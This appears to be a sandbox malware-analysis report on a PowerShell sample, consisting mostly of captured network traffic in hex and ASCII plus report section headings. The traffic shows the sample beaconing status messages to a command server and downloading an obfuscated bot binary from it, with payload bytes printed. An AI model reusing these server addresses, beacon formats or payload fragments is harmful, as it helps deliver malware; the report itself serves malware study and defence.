oC``TGwUGb0elSEPVu`S{j{Xl05emmYTmSjW14pVmeV`0qYTYCKRIONP3mC[1mEPVeKP1GoWm[JSWOWTmWTLTKIT0OC`WKINUOhcYi3VWeS[0quSoChS0[sRTeFcVSIWomKP0K1VWinT0qXTomiW0[7RTiJcFSHRoC`VD00RVbvR1mEPVeKRECNP35vUjOrWmORSVyGWjT4TWKs`3eKcD4{VmeVe1mDSYekdTj2SGGvWFSISomjP{GTXjeVcFOE
2024-11-29 08:09:11 UTC	1369	IN	Data Raw: 4b 56 4c 46 53 49 63 49 57 60 4c 31 34 54 56 6d 69 53 5b 31 79 57 53 6f 4f 68 53 7b 6a 7b 57 55 4f 52 60 46 4f 74 54 6a 71 60 60 7b 6d 30 54 56 30 46 4c 46 53 49 57 6f 6d 69 57 30 5b 37 52 54 4c 79 53 56 48 78 4f 55 43 57 4c 30 4b 33 58 31 57 72 63 57 48 78 4e 59 43 68 63 56 53 50 58 6c 75 4a 60 46 53 48 54 6c 79 6b 63 56 79 72 58 32 71 7b 55 6a 4f 72 57 6f 57 6b 63 57 5b 74 58 57 69 4e 4c 47 71 58 52 59 53 57 4c 6a 34 77 56 6d 65 52 4c 56 4b 49 57 6c 75 56 53 31 5b 37 58 59 6d 43 65 47 5b 49 53 6f 71 69 4c 45 57 6e 58 6d 65 57 5b 31 6d 74 62 47 53 60 56 44 6e 78 58 57 65 4e 63 47 6a 78 53 6f 4b 68 4c 6c 72 7b 52 56 6d 43 65 47 44 78 4e 59 57 60 63 56 79 34 58 6d 53 77 60 30 71 75 53 6f 4f 6b 4c 6d 54 32 53 47 47 76 54 30 71 59 5b 49 43 6b 4c 30 4b 72 58 Data Ascii: KVLFSIcIW`L14TVmiS[1yWSoOhS{j{WUOR`FOtTjq``{m0TV0FLFSIWomiW0[7RTLySVHxOUCWL0K3X1WrcWHxNYChcVSPXluJ`FSHTlykcVyrX2q{UjOrWoWkcW[tXWiNLGqXRYSWLj4wVmeRLVKIWluVS1[7XYmCeG[ISoqiLEWnXmeW[1mtbGS`VDnxXWeNcGjxSoKhLlr{RVmCeGDxNYW`cVy4XmSw`0quSoOkLmT2SGGvT0qY[ICkL0KrX
2024-11-29 08:09:11 UTC	1369	IN	Data Raw: 38 54 55 59 71 4e 60 6a 4b 6e 55 59 6d 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 58 57 65 5b 63 31 71 49 5b 49 4f 68 4c 6a 71 6e 58 6a 53 76 53 6d 5b 73 63 44 38 59 63 47 4b 49 57 55 40 30 56 44 79 75 64 46 79 68 63 56 50 76 58 54 4f 43 65 47 6e 7b 54 56 65 4f 50 33 75 4e 50 33 6d 43 5b 31 6d 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 30 4b 74 58 6a 62 34 60 57 6d 59 65 7b 5b 52 57 6d 71 4a 57 46 79 76 57 57 4b 72 55 6a 38 56 64 54 47 78 54 47 4f 43 60 54 79 55 4c 49 53 4c 54 7b 43 31 55 47 4c 76 65 44 79 55 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 47 4b 34 5b 57 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 56 56 31 34 60 Data Ascii: 8TUYqN`jKnUYmKO1SSc3eKP1GoXWe[c1qI[IOhLjqnXjSvSm[scD8YcGKIWU@0VDyudFyhcVPvXTOCeGn{TVeOP3uNP3mC[1mEPkeDTV8oRTOC[1mEPVeKP0KtXjb4`WmYe{[RWmqJWFyvWWKrUj8VdTGxTGOC`TyULISLT{C1UGLveDyURUeDTV8oRTOC[1mEPVeKRGK4[WDvR1mEPVeKP1GoRTOBO1SSc3eKP1GoRTOC[1mEPVeKP1GsVV14`
2024-11-29 08:09:11 UTC	1369	IN	Data Raw: 6f 52 54 4f 43 55 6a 4f 74 4c 44 34 45 63 57 6e 79 58 6c 30 4e 4c 46 47 59 4e 59 57 4b 53 54 34 34 56 6d 65 46 4c 47 71 55 4c 54 5b 68 56 44 48 76 5b 57 5b 52 63 46 4b 58 50 6d 57 60 56 46 66 76 54 6c 30 72 62 30 71 55 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 6f 52 31 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6c 4c 7b 54 6f 6d 69 57 7b 57 74 56 47 4f 52 53 33 47 59 64 46 79 54 63 54 5b 31 56 6d 4f 43 4e 54 6d 45 52 6c 79 68 56 44 48 76 5b 57 4c 30 4c 46 57 48 54 56 6d 4b 50 31 47 70 52 54 57 52 63 47 71 75 53 6b 47 68 52 47 47 6f 56 6c 30 72 62 30 71 55 50 6f 57 5b 57 7b 47 72 52 54 65 72 63 54 6d 49 4f 59 5b 6a 50 31 4b 37 58 31 65 56 60 6c 47 59 56 6f 43 60 57 30 47 4e 50 33 6d 43 5b 31 6d 45 50 59 43 44 54 56 Data Ascii: oRTOCUjOtLD4EcWnyXl0NLFGYNYWKST44VmeFLGqULT[hVDHv[W[RcFKXPmW`VFfvTl0rb0qUPkeDTV8oRTOC[3OISom[W{CoR1DvR1mEPVeKP1GoRTOBXlL{TomiW{WtVGORS3GYdFyTcT[1VmOCNTmERlyhVDHv[WL0LFWHTVmKP1GpRTWRcGquSkGhRGGoVl0rb0qUPoW[W{GrRTercTmIOY[jP1K7X1eV`lGYVoC`W0GNP3mC[1mEPYCDTV

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:12 UTC	284	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 140
2024-11-29 08:09:12 UTC	140	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 44 79 6c 61 6e 65 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
2024-11-29 08:09:13 UTC	993	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:13 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnkieH1oL36z0DSQOja3%2BT7H73Pl2OGchImhCe3Y3RdPK%2B5ePsb6a8aduTc5LDcuG7zfA4ARdi2HjHgIovv%2B8fpriexn7%2FU6QRLio2nmWFYhUZQTUUDX1mn3BIl1Ud2WsD7CMxfmHGDY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=17533&min_rtt=1293&rtt_var=24273&sent=33&recv=29&lost=0&retrans=0&sent_bytes=26852&recv_bytes=6402&delivery_rate=12835164&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11d3f0d1709fb-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158949&min_rtt=158930&rtt_var=33558&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1084&delivery_rate=24089&cwnd=252&unsent_bytes=0&cid=b0a08e9c8835b16a&ts=694&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:16 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-29 08:09:16 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-29 08:09:17 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 29 Nov 2024 08:09:17 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8ea11d59cfed0acf-LAS alt-svc: h3=":443"; ma=86400
2024-11-29 08:09:17 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fa 65 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom(e^)

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report kingsmaker_6.ca.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\05349744be1ad4ad_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\076dd576a8178299_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0786087c3c360803_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0998db3a32ab3f41_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0a71ed411241f66a_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0b05805acd0d1882_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0c8edd501377e254_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\0f25049d69125b1e_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\13121e710409f773_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\1bc86f24c60da374_0

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Code Cache\js\230e5fe3e6f82b2c_0

Windows Analysis Report
kingsmaker_6.ca.ps1

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:23 UTC	470	OUT	GET /onboarding/smskillreader.txt HTTP/1.1 Host: armmf.adobe.com Connection: keep-alive Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br If-None-Match: "78-5faa31cce96da" If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
2024-11-29 08:09:23 UTC	198	IN	HTTP/1.1 304 Not Modified Content-Type: text/plain; charset=UTF-8 Last-Modified: Mon, 01 May 2023 15:02:33 GMT ETag: "78-5faa31cce96da" Date: Fri, 29 Nov 2024 08:09:23 GMT Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:25 UTC	283	OUT	POST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca Content-Length: 69
2024-11-29 08:09:25 UTC	69	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
2024-11-29 08:09:25 UTC	1000	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:25 GMT Content-Length: 0 Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VaRf2Ls4GvbjEXrFPs%2BvfIwZqZk%2BAGd1EGlpzw%2FZkbzYOUW7sYU%2F4qNzGTBSJbiWZAgAJoJGcXG4FkPdIN4Ire385khg%2BToQt37piIzzZufLhPdoiTRWoftagC5wDn3t%2FKlk%2Bm7MoGdT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=30960&min_rtt=1257&rtt_var=26928&sent=62&recv=62&lost=0&retrans=0&sent_bytes=34322&recv_bytes=25184&delivery_rate=12835164&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11d8d1eb60ad5-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158710&min_rtt=158654&rtt_var=33542&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1012&delivery_rate=24118&cwnd=252&unsent_bytes=0&cid=8416ce3edf77b3c4&ts=661&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-29 08:09:26 UTC	332	OUT	GET /file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: kingsmaker.ca
2024-11-29 08:09:26 UTC	1114	IN	HTTP/1.1 200 OK Date: Fri, 29 Nov 2024 08:09:26 GMT Content-Type: application/octet-stream Content-Length: 8351232 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hg%2Bh3R7Ql6zO5rwUG926DR%2FHFiaAImnRcEgnG3crKK%2F9D9VDeY5W2w42lE6tmbXl9PZDj%2Bg11cHhfxhu121sAjFhHuGOv3llVLNqSuFLx9pCUgvcVekxc0PozgTjuCYexHQRal%2FGWXR1"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=33594&min_rtt=1257&rtt_var=25464&sent=64&recv=64&lost=0&retrans=0&sent_bytes=35100&recv_bytes=26120&delivery_rate=12835164&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8ea11d93ee030ad9-LAS server-timing: cfL4;desc="?proto=TCP&rtt=158805&min_rtt=158774&rtt_var=33543&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=970&delivery_rate=24109&cwnd=252&unsent_bytes=0&cid=6b392fa9f940e25d&ts=706&x=0"
2024-11-29 08:09:26 UTC	255	IN	Data Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23 Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
2024-11-29 08:09:26 UTC	1369	IN	Data Raw: 01 0a 03 0f 28 01 d5 46 01 01 47 38 01 01 15 16 01 e1 b7 0a 01 01 11 01 01 01 01 01 41 00 01 01 01 01 11 01 01 01 03 01 01 07 01 01 01 01 01 01 01 07 01 01 01 01 01 01 01 01 71 99 01 01 05 01 01 01 01 01 01 02 01 61 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01 11 Data Ascii: (FG8Aqa)Yi)UAqEQ1)A^/udyuy&
2024-11-29 08:09:26 UTC	1369	IN	Data Raw: c2 49 8a d1 e8 be d5 25 01 49 8c 04 99 d7 4f 01 49 8c 0c 88 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a3 d5 25 01 49 8c 04 d2 d7 4f 01 49 8c 0c c5 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 84 d5 25 01 49 8c 04 07 d6 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f 01 Data Ascii: I%IOIOI8tI%IOIOI8tI%IOIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIO
2024-11-29 08:09:26 UTC	1369	IN	Data Raw: ce 25 01 49 8c 04 04 db 4f 01 49 8c 0c f7 d8 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4e ce 25 01 49 8c 04 11 db 4f 01 49 8c 0c 00 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 33 ce 25 01 49 8c 04 3a db 4f 01 49 8c 0c 2d db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 14 ce 25 01 49 8c 04 2f db 4f 01 49 8c 0c 1e db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f9 cf 25 01 49 8c 04 20 db 4f 01 49 8c 0c 13 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 da cf 25 01 49 8c 04 15 db 4f 01 49 8c 0c 04 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 bf cf 25 01 49 8c 04 16 db 4f 01 49 8c 0c 09 db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a0 cf 25 01 49 8c 04 5b db 4f 01 49 8c 0c 4a db 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 85 cf 25 01 49 8c 04 4c db 4f 01 49 8c 0c 3f db 4f 01 49 82 38 01 74 00 Data Ascii: %IOIOI8tIN%IOIOI8tI3%I:OI-OI8tI%I/OIOI8tI%I OIOI8tI%IOIOI8tI%IOIOI8tI%I[OIJOI8tI%ILOI?OI8t
2024-11-29 08:09:26 UTC	1369	IN	Data Raw: 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c8 25 01 49 8c 04 96 57 90 01 49 8a 01 49 8c 0c a4 cb 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c8 25 01 49 8c 04 8e 57 90 01 49 8a 01 49 8c 0c 74 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c8 25 01 49 8c 04 76 57 90 01 49 8a 01 49 8c 0c 5c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c8 25 01 49 8c 04 5e 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c8 25 01 49 8c 04 46 57 90 01 49 8a 01 49 8c 0c 2c ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 14 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c8 25 01 49 8c 04 36 57 90 01 49 8a 01 49 8c 0c 44 ca 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c8 25 01 49 8c 04 26 57 90 01 49 8a 01 49 8c 0c 2c ca Data Ascii: I8tI%IWIIOI8tI%IWIItOI8tI%IvWII\OI8tI%I^WIIDOI8tIg%IFWII,OI8tIG%I6WIIOI8tI'%I6WIIDOI8tI%I&WII,
2024-11-29 08:09:26 UTC	1369	IN	Data Raw: 01 49 8c 0c ac c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 c5 25 01 49 8c 04 c6 52 90 01 49 8a 01 49 8c 0c 94 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 c5 25 01 49 8c 04 ae 52 90 01 49 8a 01 49 8c 0c 7c c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 c5 25 01 49 8c 04 96 52 90 01 49 8a 01 49 8c 0c 64 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 c5 25 01 49 8c 04 8e 52 90 01 49 8a 01 49 8c 0c 64 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 c5 25 01 49 8c 04 76 52 90 01 49 8a 01 49 8c 0c 4c c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 c2 25 01 49 8c 04 5e 52 90 01 49 8a 01 49 8c 0c 34 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 c2 25 01 49 8c 04 4e 52 90 01 49 8a 01 49 8c 0c 34 c9 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 c2 25 01 49 8c 04 46 52 90 01 49 Data Ascii: IOI8tI%IRIIOI8tIg%IRII\|OI8tIG%IRIIdOI8tI'%IRIIdOI8tI%IvRIILOI8tI%I^RII4OI8tI%INRII4OI8tI%IFRI
2024-11-29 08:09:26 UTC	1369	IN	Data Raw: 04 16 50 90 01 49 8a 01 49 8c 0c dc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 be 25 01 49 8c 04 fe 51 90 01 49 8a 01 49 8c 0c d4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 be 25 01 49 8c 04 ee 51 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 e7 bf 25 01 49 8c 04 ee 51 90 01 49 8a 01 49 8c 0c e4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 bf 25 01 49 8c 04 d6 51 90 01 49 8a 01 49 8c 0c d4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 bf 25 01 49 8c 04 be 51 90 01 49 8a 01 49 8c 0c bc c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 bf 25 01 49 8c 04 a6 51 90 01 49 8a 01 49 8c 0c a4 c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 bf 25 01 49 8c 04 8e 51 90 01 49 8a 01 49 8c 0c ac c7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 bf 25 01 49 Data Ascii: PIIOI8tI'%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tI%IQIIOI8tIg%IQIIOI8tIG%I
2024-11-29 08:09:26 UTC	1369	IN	Data Raw: e8 e7 b8 25 01 49 8c 04 46 4f 90 01 49 8a 01 49 8c 0c dc c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 c7 b8 25 01 49 8c 04 76 4f 90 01 49 8a 01 49 8c 0c c4 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a7 b8 25 01 49 8c 04 5e 4f 90 01 49 8a 01 49 8c 0c ac c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 87 b8 25 01 49 8c 04 4e 4f 90 01 49 8a 01 49 8c 0c 94 c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 67 b8 25 01 49 8c 04 56 4f 90 01 49 8a 01 49 8c 0c 7c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 47 b8 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c 6c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 27 b8 25 01 49 8c 04 3e 4f 90 01 49 8a 01 49 8c 0c 6c c5 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 07 b8 25 01 49 8c 04 36 4f 90 01 49 8a 01 49 8c 0c 64 c5 4f 01 49 82 38 01 74 00 c2 49 8a Data Ascii: %IFOIIOI8tI%IvOIIOI8tI%I^OIIOI8tI%INOIIOI8tIg%IVOII\|OI8tIG%I>OIIlOI8tI'%I>OIIlOI8tI%I6OIIdOI8tI
